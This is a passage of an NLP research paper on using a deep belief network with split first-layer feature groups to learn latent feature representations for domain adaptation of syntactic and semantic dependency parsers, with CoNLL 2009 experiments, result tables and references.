.visit P SBJ OPRD IM OBJ NMOD ROOT OBJ Figure 1: A path feature example. The red edges are the path between She and visit and thus the relation path fea- ture between them is SBJ↑OPRD↓IM↓OBJ↓ based on the data sample’s original feature vector. Our DBN model is trained unsupervisedly on orig- inal feature vectors of data in both domains: train- ing data from the source domain, and unlabeled data from the target domain. So our DBN model can pro- duce a common feature representation for data from both domains. A common feature representation can make two domains more similar and thus is very helpful for domain adaptation (Blitzer, 2006). Dis- criminative models using our latent features adapt better to the target domain than models using origi- nal features. Discriminative models in syntactic and semantic parsers usually use millions of features. Applying a typical DBN to learn a sensible LFR on that many original features is computationally too expensive and impractical (Raina et al., 2009). Therefore, we constrain the DBN by splitting the original features into groups. In this way, we largely reduce the com- putational cost and make LFR learning practical. We carried out experiments on the English data of the CoNLL 2009 shared task. We use a basic pipelined system and compare the effectiveness of the two fea- ture representations: original feature representation and our LFR. Using the original features, the per- formance drop on out-of-domain test data is 10.58 points in Macro F1 score. In contrast, using the LFR, the performance drop is only 4.97 points. And we have achieved a Macro F1 score of 80.83% on the out-of-domain test data. As far as we know, this is the best result on this data set to date. 2 Related Work Dependency parsing and semantic role labeling are two standard tasks in the NLP community. There have been many works on the two tasks (McDon- ald et al., 2005; Gildea and Jurafsky, 2002; Yang and Zong, 2014; Zhuang and Zong, 2010a; Zhuang and Zong, 2010b, etc). Among them, researches on domain adaptation for dependency parsing and SRL are directly related to our work. Dredze et al., (2007) show that domain adaptation is hard for de- pendency parsing based on results in the CoNLL 2007 shared task (Nivre et al., 2007). Chen et al., (2008) adapted a syntactic dependency parser by learning reliable information on shorter dependen- cies in unlabeled target domain data. But they do not consider the task of semantic dependency pars- ing. Huang et al., (2010) used an HMM-based la- tent variable language model to adapt a SRL system. Their method is tailored for a chunking-based SRL system and can hardly be applied to our dependency based task. Weston et al., (2008) used deep neural networks to improve an SRL system. But their tests are on in-domain data. On methodology, the work in Glorot et al., (2011) and Titov (2011) is closely related to ours. They also focus on learning LFRs for domain adaptation. However, their work deals with domain adaptation for sentiment classification, which uses much fewer features and training samples. So they do not need to worry about computational cost as much as we do. Titov (2011) used a graphical model that has only one layer of hidden variables. On contrast, we need to use a model with two layers of hidden variables and split the first hidden layer to reduce computational cost. The model of Titov (2011) also embodies a specific classifier. But our model is in- dependent of the classifier to be used. Glorot et al., (2011) used a model called Stacked Denoising Auto-Encoders, which also contains multiple hidden layers. However, they do not exploit the hierarchi- cal structure of their model to reduce computational cost. By splitting, our model contains much less pa- rameters than theirs. In fact, the models in Glorot et al., (2011) and Titov (2011) cannot be applied to our task simply because of the high computational cost. 3 Our DBN Model for LFR In discriminative models, each data sample is rep- resented as a vector of features. Our DBN model maps this original feature vector to a vector of latent 272 features. And we use this latent feature vector to rep- resent the sample, i.e., we replace the whole original feature vector by the latent feature vector. In this section, we introduce how our DBN model repre- sent a data sample as a vector of latent features. Be- fore introducing our DBN model, we first review a simpler model called Restricted Boltzman Machines (RBM) (Hinton et al., 2006). When training a DBN model, RBM is used as a basic unit in a DBN. 3.1 Restricted Boltzmann Machines An RBM is an undirected graphical model with a layer of visible variables v = (v1, ...,vm), and a layer of hidden variables h = (h1, ...,hn). These variables are binary. Figure 2 shows a graphical rep- resentation of an RBM. ... ... ... ... (a) (b) h v h v Figure 2: Graphical representations of an RBM: (a) rep- resents an RBM. (b) is a more compact representation The parameters of an RBM are θ = (W,a,b) where W = (Wij)m×n is a matrix with Wij be- ing the weight for the edge between vi and hj, and a = (a1, ...,am), b = (b1, ...,bn) are bias vectors for v and h respectively. The probabilistic model of an RBM is: p(v,h|θ) = 1 Z(θ) exp(−E(v,h)) (1) where E(v,h) = − m∑ i=1 aivi − n∑ j=1 bjhj − m∑ i=1 n∑ j=1 viwijhj Z(θ) = ∑ v,h exp(−E(v,h)) Because the connections in an RBM are only be- tween visible and hidden variables, the conditional distribution over a hidden or a visible variable is quite simple: p(hj = 1|v) = σ(bj + m∑ i=1 viwij) (2) p(vi = 1|h) = σ(ai + n∑ j=1 hiwij) (3) where σ(x) = 1/(1 + exp(−x)) is the logistic sig- moid function. An RBM can be efficiently trained on a sequence of visible vectors using the Contrastive Divergence method (Hinton, 2002). 3.2 The Problem of Large Scale In our syntactic and semantic parsing task, all fea- tures are binary. So each data sample (an shift ac- tion in syntactic parsing or an argument candidate in semantic parsing) is represented as a binary feature vector. By treating a sample’s feature vector as vis- ible variable vector in an RBM, and taking hidden variables as latent features, we could get the LFR of this sample using the RBM. However, for our syntactic and semantic parsing tasks, training such an RBM is computationally impractical due to the following considerations. Let m,n denote respec- tively the number of visible and hidden variables in the RBM. Then there are O(mn) parameters in this RBM. If we train the RBM on d samples, then the time complexity for Contrastive Divergence training is O(mnd). For syntactic or semantic parsing, there are over 1 million unique binary features, and mil- lions of training samples. That means both m and d are in an order of 106. With m and n of that order, n should not be chosen too small to get a sensible LFR (Hinton, 2010). Our experience indicates that n should be at least in an order of 103. Now we see why the O(mnd) complexity is formidable for our task. 3.3 Our DBN Model A DBN is a probabilistic generative model that is composed of multiple layers of stochastic, latent variables (Hinton et al., 2006). The motivation of us- ing a DBN is two-fold. First, previous research has shown that a deep network can capture high-level correlations between visible variables better than an RBM (Bengio, 2009). Second, as shown in the pre- ceding subsection, the large scale of our task poses 273 ...h2 v h 1 ...... ...... ... ... ...... Figure 3: Our DBN model. The blue nodes stand for the visible variables (v) and the blank node stands for the hidden variables (h1 and h2). The symbols are also used in the figures of the following subsectins. a great challenge for learning an LFR. By manipu- lating the hierarchical structure of a DBN, we can significantly reduce the number of parameters in the DBN model. This largely reduces the computational cost for training the DBN. Without this technique, it is impractical to learn a DBN model with that many parameters on large training sets. As shown in Fig.3, our DBN model contains 2 layers of hidden variables: h1,h2, and a visible vec- tor v. The visible vector corresponds to a sample’s original feature vector. The second-layer hidden variable vector h2 are used as the LFR of this sam- ple. Suppose there are m,n1,n2 variables in v,h1,h2 respectively. To reduce the number of parameters in the DBN, we split its first layer (h1 − v) into k groups, as we will explain in the following sub- section. We confine the connections in this layer to variables within the same group. So there are only mn1/k parameters in the first layer. Without splitting, the number of parameters would be mn1. Therefore, learning that many parameters requires too much computation. By splitting, we reduce the number of parameters by a factor of k. If we choose k big enough, learning is feasible. The second layer (h2 −h1) is fully connected, so that the variables in the second layer can capture the relations between variables in different groups in the first layer. There are n1n2 parameters in the sec- ond layers. Because n1 and n2 are relatively small, learning the parameters in the second layer is also feasible. In summary, by splitting the first layer into groups, we have largely reduced the number of pa- rameters in our DBN model. This makes learning our DBN model practical for our task. In our task, visible variables corresponds to original binary fea- tures and the second layer hidden variables are used as the LFR of these original features. One deficiency of splitting is that the relationships between original features in different groups can not be captured by hidden variables in the first layer. However, this de- ficiency is compensated by using the second layer to capture relationships between all variables in the first layer. In this way, the second layer still cap- tures the relationships between all original features indirectly. 3.3.1 Splitting Features into Groups When we split the first layer into k groups, ev- ery group, except the last one, contains bm/kc vis- ible variables and bn1/kc hidden variables. The last group contains the remaining visible and hidden variables. But how to split the visible variables, i.e., the original features, into these groups? Of course there are many ways to split the original features. But it is difficult to find a good principle to split. So we tried two splitting strategies in this paper. The first strategy is very simple. We arrange all features as the order they appeared in the training data . Sup- pose each group contains r original features. We just put the first r unique features of training data into the first group, the following r unique features into the second group, and so on. The second strategy is more sophisticated. All features can be divided into three categories: the common features, the source-specific features and the target-specific features. Its main idea is to make each group contain the three categories of features evenly, which we think makes the distribution of fea- tures close to the ‘true’ distribution over domains. Let Fs and Ft denote the sets of features that ap- peared on source and target domain data respec- tively. We collect Fs and Ft from our training data. The features in Fs and Ft are are ordered the same as the order they appeared in training data. And let Fs∩t = Fs ∩ Ft (the common features), Fs\t = Fs\Ft (the source-specific features), Ft\s = Ft\Fs (the target-specific features). So, to evenly dis- tribute features in Fs∩t, Fs\t and Ft\s to each group, each group should consist of |Fs∩t|/k, |Fs\t|/k and |Ft\s|/k features from Fs∩t, Fs\t and Ft\s respec- 274 tively. Therefore, we put the first |Fs∩t|/k features from Fs∩t, the first |Fs\t|/k features from Fs\t and the first |Ft\s|/k features from Ft\s into the first group. Similarly, we put the second |Fs∩t|/k fea- tures from Fs∩t, the second |Fs\t|/k features from Fs\t and the second |Ft\s|/k features from Ft\s into the second group. The intuition of this strategy is to let features in Fs∩t act as pivot features that link fea- tures in Fs\t and Ft\s in each group. In this way, the first hidden layer might capture better relationships between features from source and target domains. 3.3.2 LFR of a Sample Given a sample represented as a vector of origi- nal features, our DBN model will represent it as a vector of latent features. The sample’s original fea- ture vector corresponds to the visible vector v in our DBN model in Figure 3. Our DBN model uses the second-layer hidden variable vector h2 to represent this sample. Therefore, we must infer the value of hidden variables in the second-layer given the vis- ible vector. This inference can be done using the methods in Hinton et al., (2006). Given the visible vector, the values of the hidden variables in every layer can be efficiently inferred in a single, bottom- up pass. 3.4 Training Our DBN Model Inference in a DBN is simple and fast. Nonetheless, training a DBN is more complicated. A DBN can be trained in two stages: greedy layer-wise pretraining and fine tuning (Hinton et al., 2006). 3.4.1 Greedy Layer-wise Pretraining In this stage, the DBN is treated as a stack of RBMs as shown in Figure 4. The second layer is treated as a single RBM. The first layer is treated as k parallel RBMs with each group being one RBM. These k RBMs are paral- lel because their visible variable vectors constitute a partition of the original feature vector. In this stage, we train these constituent RBMs in a bottom- up layer-wise manner. To learn parameters in the first layer, we only need to learn the parameters of each RBM in the first layer. With the original feature vector v given, these k RBMs can be trained using the Contrastive Diver- gence method (Hinton, 2002). After the first layer is ...h2 h 1 ...... ...... ... ... RBM ... ... RBM ... ... RBM ... ... RBM Figure 4: Stack of RBMs in pretraining. trained, we will fix the parameters in the first layer and start to train the second layer. For the RBM of the second layer, its visible vari- ables are the hidden variables in the first layer. Given an original feature vector v, we first infer the acti- vation probabilities for the hidden variables in the first layer using equation (2). And we use these ac- tivation probabilities as values for visible variables in the second layer RBM. Then we train the second layer RBM using contrastive divergence algorithm. Note that the activation probabilities are not binary values. But this is only a trick for training because using probabilities generally produces better models (Hinton et al., 2006). This trick does not change our assumption that each variable is binary. 3.4.2 Fine Tuning The greedy layer-wise pretraining initializes the parameters of our DBN to sensible values. But these values are not optimal and the parameters need to be fine tuned. For fine tuning, we unroll the DBN to form an autoencoder as in Hinton and Salakhutdinov (2006), which is shown in Figure 5. In this autoencoder, the stochastic activities of bi- nary hidden variables are replaced by its activation probabilities. So the autoencoder is in essence a feed-forward neural network. We tune the param- eters of our DBN model on this autoencoder using backpropagation algorithm. 4 Domain Adaptation with Our DBN Model In this section, we introduce how to use our DBN model to adapt a basic syntactic and semantic de- 275 ... ...... ...... ...... ...... ...... ...... ...... ...... Figure 5: Unrolling the DBN. pendency parsing system to target domain. 4.1 The Basic Pipelined System We build a typical pipelined system, which first an- alyze syntactic dependencies, and then analyze se- mantic dependencies. This basic system only serves as a platform for experimenting with different fea- ture representations. So we just briefly introduce our basic system in this subsection. 4.1.1 Syntactic Dependency Parsing For syntactic dependency parsing, we use a de- terministic shift-reduce method as in Nivre et al., (2006). It has four basic actions: left-arc, right-arc, shift, and reduce. A classifier is used to determine an action at each step. To decide the label for each dependency link, we extend the left/right-arc actions to their corresponding multi-label actions, leading to 31 left-arc and 66 right-arc actions. Altogether a 99- class problem is yielded for parsing action classifi- cation. We add arcs to the dependency graph in an arc eager manner as in Hall et al., (2007). We also projectivize the non-projective sequences in training data using the transformation from Nivre and Nils- son (2005). A maximum entropy classifier is used to make decisions at each step. The features utilized are the same as those in Zhao et al., (2008). 4.1.2 Semantic Dependency Parsing Our semantic dependency parser is similar to the one in Che et al., (2009). We first train a predicate sense classifier on training data, using the same fea- tures as in Che et al., (2009). Again, a maximum en- tropy classifier is employed. Given a predicate, we need to decide its semantic dependency relation with each word in the sentence. To reduce the number of argument candidates, we adopt the pruning strat- egy in Zhao et al., (2009), which is adapted from the strategy in Xue and Palmer (2004). In the seman- tic role classification stage, we use a maximum en- tropy classifier to predict the probabilities of a can- didate to be each semantic role. We train two differ- ent classifiers for verb and noun predicates using the same features as in Che et al., (2009). We use a sim- ple method for post processing. If there are dupli- cate arguments for ARG0∼ARG5, we preserve the one with the highest classification probability and remove its duplicates. 4.2 Adapting the Basic System to Target Domain In our basic pipeline system, both the syntactic and semantic dependency parsers are built using dis- criminative models. We train a syntactic parsing model and a semantic parsing model using the orig- inal feature representation. We will refer to this syn- tactic parsing model as OriSynModel, and the se- mantic parsing model as OriSemModel. However, these two models do not adapt well to the target do- main. So we use the LFR of our DBN model to train new syntactic and semantic parsing models. We will refer to the new syntactic parsing model as LatSyn- Model, and the new semantic parsing model as Lat- SemModel. Details of using our DBN model are as follows. 4.2.1 Adapting the Syntactic Parser The input data for training our DBN model are the original feature vectors on training and unla- beled data. Therefore, to train our DBN model, we first need to extract the original features for syntactic parsing on these data. Features on training data can be directly extracted using golden-standard annota- tions. On unlabeled data, however, some features cannot be directly extracted. This is because our syntactic parser uses history-based features which depend on previous actions taken when parsing a sentence. Therefore, features on unlabeled data can only be extracted after the data are parsed. To solve this problem, we first parse the unlabeled data using the already trained OriSynModel. In this way, we 276 can obtain the features on the unlabeled data. Be- cause of the poor performance of the OriSynModel on the target domain, the extracted features on un- labeled data contains some noise. However, exper- iments show that our DBN model can still learn a good LFR despite the noise in the extracted features. Using the LFR, we can train the syntactic parsing model LatSynModel. Then by applying the LFR on test and unlabeled data, we can parse the data using LatSynModel. Experiments in later sections show that the LatSynModel adapts much better to the tar- get domain than the OriSynModel. 4.2.2 Adapting the Semantic Parser The situation here is similar to the adaptation of the syntactic parser. Features on training data can be directly extracted. To extract features on unla- beled data, we need to have syntactic dependency trees on this data. So we use our LatSynModel to parse the unlabeled data first. And we automatically identify predicates on unlabeled data using a clas- sifier as in Che et al., (2008). Then we extract the original features for semantic parsing on unlabeled data. By feeding original features extracted on these data to our DBN model, we learn the LFR for se- mantic dependency parsing. Using the LFR, we can train the semantic parsing model LatSemModel. 5 Experiments 5.1 Experiment Setup 5.1.1 Experiment Data We use the English data in the CoNLL 2009 shared task for experiments. The training data and in-domain test data are from the WSJ corpus, whereas the out-of-domain test data is from the Brown corpus. We also use unlabeled data consist- ing of the following sections of the Brown corpus: K, L, M, N, P. The test data are excerpts from fic- tions. The unlabeled data are also excerpts from fic- tions or stories, which are similar to the test data. Although the unlabeled data is actually annotated in Release 3 of the Penn Treebank, we do not use any information contained in the annotation, only using the raw texts. The training, test and unlabeled data contains 39279, 425, and 16407 sentences respec- tively. 5.1.2 Settings of Our DBN Model For the syntactic parsing task, there are 748,598 original features in total. We use 7,486 hidden vari- ables in the first layer and 3,743 hidden variables in the second layer. For semantic parsing, there are 1,074,786 original features. We use 10,748 hidden variables in the first layer and 5,374 hidden variables in the second layer. In our DBN models, we need to determine the number of groups k. Because larger k means less computational cost, k should not be set too small. We empirically set k as follows: according to our experience, each group should contain about 5000 original features. We have about 106 original fea- tures in our tasks. So we estimate k ≈ 106/5000 = 200. And we set k to be 200 in the DBN models for both syntactic and semantic parsing. As for split- ting strategy, we use the more sophisticated one in subsection 3.3.1 because it should generate better re- sults than the simple one. 5.1.3 Details of DBN Training In greedy pretraining of the DBN, the contrastive divergence algorithm is configured as follows: the training data is divided to mini-batches, each con- taining 100 samples. The weights are updated with a learning rate of 0.3, momentum of 0.9, weight de- cay of 0.0001. Each layer is trained for 30 passes (epochs) over the entire training data. In fine-tuning, the backpropagation algorithm is configured as follows: The training data is divided to mini-batches, each containing 50 samples. The weights are updated with a learning rate of 0.1, mo- mentum of 0.9, weight decay of 0.0001. The fine- tuning is repeated for 50 epochs over the entire train- ing data. We use the fast computing technique in Raina et al., (2009) to learn the LFRs. Moreover, in greedy pretraining, we train RBMs in the first layer in par- allel. 5.2 Results and Discussion We use the official evaluation measures of the CoNLL 2009 shared task, which consist of three dif- ferent scores: (i) syntactic dependencies are scored using the labeled attachment score, (ii) semantic de- pendencies are evaluated using a labeled F1 score, and (iii) the overall task is scored with a macro av- 277 Test data System LAS Sem F1 Macro F1 WSJ Ori 87.63 84.82 86.24 Lat 87.30 84.25 85.80 Brown Ori 79.72 71.57 75.67 Lat 82.84 78.75 80.83 Table 1: The results of our basic and adapted systems erage of the two previous scores. The three scores above are represented by LAS, Sem F1, and Macro F1 respectively in this paper. 5.2.1 Comparison with Un-adapted System Our basic system uses the OriSynModel for syn- tactic parsing, and the OriSemModel for semantic parsing. Our adapted system uses the LatSynModel for syntactic parsing, and the LatSemModel for se- mantic parsing. The results of these two systems are shown in Table 1, in which our basic and adapted systems are denoted as Ori and Lat respectively. From the results in Table 1, we can see that Lat performs slightly worse than Ori on in-domain WSJ test data. But on the out-of-domain Brown test data, Lat performs much better than Ori, with 5 points im- provement in Macro F1 score. This shows the effec- tiveness of our method for domain adaptation tasks. 5.2.2 Different Splitting Configurations As described in subsection 5.1.2, we have em- pirically set the number of groups k to be 200 and chosen the more sophisticated splitting strategy. In this subsection, we experiment with different split- ting configurations to see their effects. Under each splitting configuration, we learn the LFRs using our the DBN models. Using the LFRs, we test the our adapted systems on both in-domain and out-of-domain data. Therefore we get many test results, each corresponding to a splitting configura- tion. The in-domain and out-of-domain test results are reported in Table 2 and Table 3 respectively. In these two tables, ‘s1’ and ‘s2’ represents the sim- ple and the more sophisticated splitting strategies in subsection 3.3.1 respectively. ‘k’ represents the number of groups in our DBN models. For both syntactic and semantic parsing, we use the same k in their DBN models. The ‘Time’ column reports the training time of our DBN models for both syn- tactic and semantic parsing. The unit of the ‘Time’ Str k Time(h) LAS Sem F1 Macro F1 s1 100 392 85.95 82.42 84.19 200 261 85.76 82.14 83.95 300 218 85.48 81.68 83.58 400 196 84.80 80.24 82.52 s2 100 392 86.22 83.03 84.63 200 261 86.10 82.89 84.50 300 218 85.72 82.24 83.98 400 196 84.96 81.13 83.05 Table 2: Results of different splitting configurations on in-domain WSJ development data Str k Time(h) LAS Sem F1 Macro F1 s1 100 392 82.81 78.77 80.82 200 261 82.73 78.49 80.63 300 218 82.44 77.90 80.37 400 196 81.83 76.72 79.31 s2 100 392 82.95 79.03 81.03 200 261 82.84 78.75 80.83 300 218 82.63 78.34 80.50 400 196 81.97 76.98 79.51 Table 3: Results of different splitting configurations on out-of-domain Brown test data column is the hour. Please note that we only need to train our DBN models once. And we report the training time in Table 2. For easy viewing, we re- peat those training times in Table 3. But this does not mean we need to train new DBN models for out- of-domain test. From Tables 2 and 3 we get the following obser- vations: First, although the more sophisticated splitting strategy ‘s2’ generate slightly better result than the simple strategy ‘s1’, the difference is not signifi- cant. This means that the hierarchical structure of our DBN model can robustly capture the relation- ships between features. Even with the simple split- ting strategy ‘s1’, we still get quite good results. Second, the ‘Time’ column in Table 2 shows that different splitting strategies with the same k value has the same training time. This is reasonable be- cause training time only depends on the number of parameters in our DBN model. And different split- ting strategies do not affect the number of parame- ters in our DBN model. 278 Third, the number of groups k affects both the training time and the final results. When k increases, the training time reduces but the results degrade. As k gets larger, the time reduction gets less obvious, but the degradation of results gets more obvious. When k = 100, 200, 300, there is not much differ- ence between the results. This shows that the results of our DBN model is not sensitive to the values of k within a range of 100 around our initial estima- tion 200. But when k is further away from our es- timation, e.g. k = 400, the results get significantly worse. Please note that the results in Tables 2 and 3 are not used to tune the parameter k or to choose a split- ting strategy in our DBN model. As mentioned in subsection 5.1.2, we have chosen k = 200 and the more sophisticated splitting strategy beforehand. In this paper, we always use the results with k = 200 and the ‘s2’ strategy as our main results, even though the results with k = 100 are better. 5.3 The Size of Unlabeled Target Domain Data An interesting question for our method is how much unlabeled target domain data should be used. To em- pirically answer this question, we learn several LFRs by gradually adding more unlabeled data to train our DBN model. We compared the performance of these LFRs as shown in Figure 6. 74 76 78 80 82 84 86 88 0 3000 6000 9000 12000 15000 18000 Target Domain Test Source Domain Test Figure 6: Macro F1 scores on test data with respect to the size of unlabeled target domain data used in DBN train- ing. The horizontal axis is the number of sentences in unlabeled target domain data and the coordinate axis is the Macro F1 Score. From Figure 6, we can see that by adding more unlabeled target domain data, our system adapts bet- ter to the target domain with only small degradation of result on source domain. However, with more un- labeled data used, the improvement on target domain result gradually gets smaller. 5.4 Comparison with other methods In this subsection, we compare our method with sev- eral systems. These are described below. Daume07. Daumé III (2007) proposed a simple and effective adaptation method by augmenting fea- ture vector. Its main idea is to augment the feature vector. They took each feature in the original prob- lem and made three versions of it: a general version, a source-specific version and a target-specific ver- sion. Thus, the augmented source data contains only general and source-specific versions; the augmented target data contains general and target-specific ver- sions. In the baseline system, we adopt the same technique for dependency and semantic parsing. Chen. The participation system of Zhao et al., (2009), reached the best result in the out-of-domain test of the CoNLL 2009 shared task. In Daumé III and and Marcu (2006), they pre- sented and discussed several ‘obvious’ ways to at- tack the domain adaptation problem without devel- oping new algorithms. Following their idea, we con- struct similar systems. OnlySrc. The system is trained on only the data of the source domain (News). OnlyTgt. The system is trained on only the data of the target domain (Fiction). All. The system is trained on all data of the source domain and the target domain. It is worth noting that training the systems of Daume07, OnlyTgt and All need the labeled data of the target domain. We utilize OnlySrc to parse the unlabeled data of the target domain to generate the labeled data. ALl comparison results are shown in Table 4, in which the ‘Diff’ column is the difference of scores on in-domain and out-of-domain test data. First, we compare OnlySrc, OnlyTgt and All. We can see that OnlyTgt performs very poor both in the source domain and in the target domain. It is not hard to understand that OnlyTgt performs poor in the source domain because of the adaptation prob- lem. OnlyTgt also performs poor in the target do- main. We think the main reason is that OnlyTgt is trained on the auto parsed data in which there are 279 Score System WSJ Brown Diff LAS OnlySrc 87.63 79.72 7.91 OnlyTgt 73.25 78.30 5.05 All 87.41 80.54 6.87 Daume07 87.47 80.46 7.01 Chen 89.19 82.38 6.81 Ours 87.30 82.84 4.46 Sem F1 OnlySrc 84.82 71.57 13.25 OnlyTgt 73.74 70.34 3.40 All 84.68 72.75 11.93 Daume07 84.52 72.90 11.62 Chen 86.15 74.58 11.57 Ours 84.25 78.75 5.50 Macro F1 OnlySrc 86.24 75.67 10.57 OnlyTgt 73.50 74.32 0.82 All 86.04 76.65 9.40 Daume07 86.00 76.68 9.32 Chen 87.69 78.51 9.18 Ours 85.80 80.83 4.97 Table 4: Comparison with other methods. many parsing errors. But we note that All performs better than both OnlySrc and OnlyTgt on the target domain test, although its training data contains some auto parsed data. Therefore, the data of the target domain, labeled or unlabeled, are potential in alle- viating the adaptation problem of different domains. But All just puts the auto parsed data of the target domain into the training set. Thus, its improvement on the test data of the target domain is limited. In fact, how to use the data of the target domain, espe- cially the unlabeled data, in the adaptation problem is still an open and hot topic in NLP and machine learning. Second, we compare Daume07, All and our method. In Daume07, they reported improvement on the target domain test. But one point to note is that the target domain data used in their experi- ments is labeled while in our case there is only un- labeled data. We can see Daume07 have compara- ble performance with All in which there is not any adaptation strategy besides adding more data of the target domain. We think the main reason is that there are many parsing errors in the data of the tar- get domain. But our method performs much better than Daume07 and All even though some faulty data are also utilized in our system. This suggests that our method successfully learns new robust represen- tations for different domains, even when there are some noisy data. Third, we compare Chen with our method. Chen reached the best result in the out-of-domain test of the CoNLL 2009 shared task. The results in Table 4 show that Chen’s system performs better than ours on in-domain test data, especially on LAS score. Chen’s system uses a sophisticated graph-based syn- tactic dependency parser. Graph-based parsers use substantially more features, e.g. more than 1.3 × 107 features are used in McDonald et al., (2005). Learning an LFR for that many features would take months of time using our DBN model. So at present we only use a transition-based parser. The better per- formance of Chen’s system mainly comes from their sophisticated syntactic parsing method. To reduce the sparsity of features, Chen’s sys- tem uses word cluster features as in Koo et al., (2008). On out-of-domain tests, however, our sys- tem still performs much better than Chen’s, espe- cially on semantic parsing. To our knowledge, on out-of-domain tests on this data set, our system has obtained the best performance to date. More im- portantly, the performance difference between indo- main and out-of-domain tests is much smaller in our system. This shows that our system adapts much better to the target domain. 6 Conclusions In this paper, we propose a DBN model to learn LFRs for syntactic and semantic parsers. These LFRs are common representations of original fea- tures in both source and target domains. Syntactic and semantic parsers using the LFRs adapt to tar- get domain much better than the same parsers us- ing original feature representation. Our model pro- vides a unified method that adapts both syntactic and semantic dependency parsers to a new domain. In the future, we hope to further scale up our method to adapt parsing models using substantially more features, such as graph-based syntactic dependency parsing models. We will also search for better split- ting strategies for our DBN model. Finally, although our experiments are conducted on syntactic and se- mantic parsing, it is expected that the proposed ap- 280 proach can be applied to the domain adaptation of other tasks with little adaptation efforts. Acknowledgements The research work has been partially funded by the Natural Science Foundation of China under Grant No.61333018 and supported by the West Light Foundation of Chinese Academy of Sciences under Grant No.LHXZ201301. We thank the three anony- mous reviewers and the Action Editor for their help- ful comments and suggestions. References Yoshua Bengio. 2009. Learning Deep Architectures for AI. In Foundations and Trends in Machine Learning, 2(1):1-127. John Blitzer, Ryan McDonald and Fernando Pereira. 2006. Domain Adaptation with sturctural correspon- dance learning. In Proceedings of ACL-2006. Wanxiang Che, Zhenghua Li, Yuxuan Hu, Yongqiang Li, Bing Qin, Ting Liu and Sheng Li. 2008. A Cascaded Syntactic and Semantic Dependency Parsing System. In Proceedings of CoNLL-2008 shared task. Wanxiang Che, Zhenghua Li, Yongqiang Li, Yuhang Guo, Bing Qin and Ting Liu. 2009. Multilingual Dependency-based Syntactic and Semantic Parsing. In Proceedings of CoNLL-2009 shared task. Wenliang Chen, YouzhengWu and Hitoshi Isahara. 2008. Learning reliable information for dependency parsing adaptation. In Proceedings of COLING-2008. Hal Daumé III. 2007. Frustratingly Easy Domain Adap- tation. In Proceedings of ACL-2007. Hal Daumé III and Daniel Marcu. 2006. Domain Adap- tation for Statistical Classifer. In Journal of Artificial Intelligence Research, 26(2006), 101-126. Mark Dredze, John Blitzer, Partha P. Talukdar, Kuzman Ganchev, Joao Graca and Fernando Pereira. 2007. Frustratingly Hard Domain Adaptation for Depen- dency Parsing. In Proceedings of EMNLP-CoNLL- 2007. Xavier Glorot, Antoine Bordes and Yoshua Bengio. 2011. Domain Adaptation for Large-Scale Sentiment Classification: A Deep Learning Approach. In Pro- ceedings of International Conference on Machine Learning (ICML) 2011. Daniel Gildea and Daniel Jurafsky. 2002. Automatic la- beling for semantic roles. In Computational Linguis- tics, 28(3): 245-288. I. Goodfellow, Q. Le, A. Saxe and A. Ng. 2009. Mea- suring invariances in deep networks. In Proceedings of Advances in Neural Information Processing Sys- tems(NIPS)2011. Jan Hajič, Massimiliano Ciaramita, Richard Johans- son, Daisuke Kawahara, Maria Antònia Martı́, Lluı́s Màrquez, Adam Meyers, Joakim Nivre, Sebastian Padó, Jan Štěpánek, Pavel Straňák, Mihai Surdeanu, Nianwen Xue and Yi Zhang. 2009. The CoNLL-2009 Shared Task: Syntactic and Semantic Dependencies in Multiple Languages. In Proceedings of CoNLL-2009. J. Hall, J. Nilsson, J. Nivre, G. Eryiǧit, B. Megyesi, M. Nilsson, and M. Saers. 2007. Single Malt or Blended? A Study in Multilingual Parser Optimization. In Pro- ceedings of EMNLP-CoNLL-2007. Geoffrey Hinton. 2010. A Practical Guide to Train- ing Restricted Boltzmann Machines. In Technical re- port 2010-003, Machine Learning Group, University of Toronto. Geoffrey Hinton. 2002. Training products of experts by minimizing constrastive divergence. In Neural Com- putation, 14(8): 1711-1800. Geoffrey Hinton, Simon Osindero and Yee-Whye Teh. 2006. A fast learning algorithm for deep belief nets. In Neural Computation, 18(7): 1527-1554. Geoffrey Hinton and R. Salakhutdinov. 2006. Reducing the dimensionality of data with neural networks. In Science, 313(5786), 504-507. Richard Johansson and Pierre Nugues. 2008. Dependency-based semantic role labeling of Prop- Bank. In Proceedings of EMNLP-2008. Terry Koo, Xavier Carreras and Michael Collins. 2008. Simple Semi-supervised Dependency Parsing. In Pro- ceedings of ACL-HLT-2008. Lluı́s Màrquez, Xavier Carreras, Kenneth C.Litkowski and Suzanne Stevenson. 2008. Semantic Role Label- ing: An Introduction to the Special Issue. In Compu- tational Linguistics, 34(2):145-159. Ryan McDonald, Fernando Pereira, Jan Hajˇc, and Kiril Ribarov. 2005. Non-projective dependency parsing using spanning tree algortihms. In Proceedings of NAACL-HLT-2005. J. Nivre, J. Hall, S. Kübler, R. Mcdonald, J. Nilsson, S. Riedel, and D. Yuret. 2007. The CoNLL 2007 Shared Task on Dependency Parsing. In Proceedings of CoNLL-2007. J. Nivre, J. Hall, J. Nilsson, G. Eryiǧit and S. Marinov. 2006. Labeled Pseudo-Projective Dependency Parsing with Support Vector Machines. In Proceedings of CoNLL-2006. J. Nivre, and J. Nilsson. 2005. Pseudo-projective depen- dency parsing. In Proceedings of ACL-2005. Rajat Raina, Anand Madhavan, and Andrew Y. Ng. 2009. Large-scale Deep Unsupervised Learning us- ing Graphics Processors. In Proceedings of the 26th 281 Annual International Conference on Machine Learn- ing(ICML), pages 152-164. Mihai Surdeanu, Richard Johansson, Adam Meyers, Lluı́s Màrquez and Joakim Nivre. 2008. The CoNLL- 2008 Shared Task on Joint Parsing of Syntactic and Semantic Dependencies. In Proceedings of CoNLL- 2008. Ivan Titov. 2011. Domain Adaptation by Constraining Inter-Domain Variability of Latent Feature Represen- tation. In Proceedings of ACL-2011. Joseph Turian, Lev Ratinov and Yoshua Bengio. 2010. Word representations: a simple and general method for semi-supervised learning. In Proceedings of ACL- 2010. J. Weston, F. Rattle, and R. Collobert. 2008. Deep Learn- ing via Semi-Supervised Embedding. In Proceed- ings of International Conference on Machine Learn- ing(ICML). Nianwen Xue and Martha Palmer. 2004. Calibrating fea- tures for semantic role labeling. In Proceedings of EMNLP-2004. Haitong Yang and Chengqing Zong. 2014. Multi- Predicate Semantic Role Labeling. In Proceedings of EMNLP-2014. Hai Zhao, Wenliang Chen, Chunyu Kit, Guodong Zhou. 2009. Multilingual Dependency Learning: Exploiting Rich Features for Tagging Syntactic and Semantic De- pendencies. In Proceedings of CoNLL-2009 shared task. Hai Zhao and Chunyu Kit. 2008. Parsing Syntactic and Semantic Dependencies with Two Single-Stage Max- imum Entropy Models. In Proceedings of CoNLL- 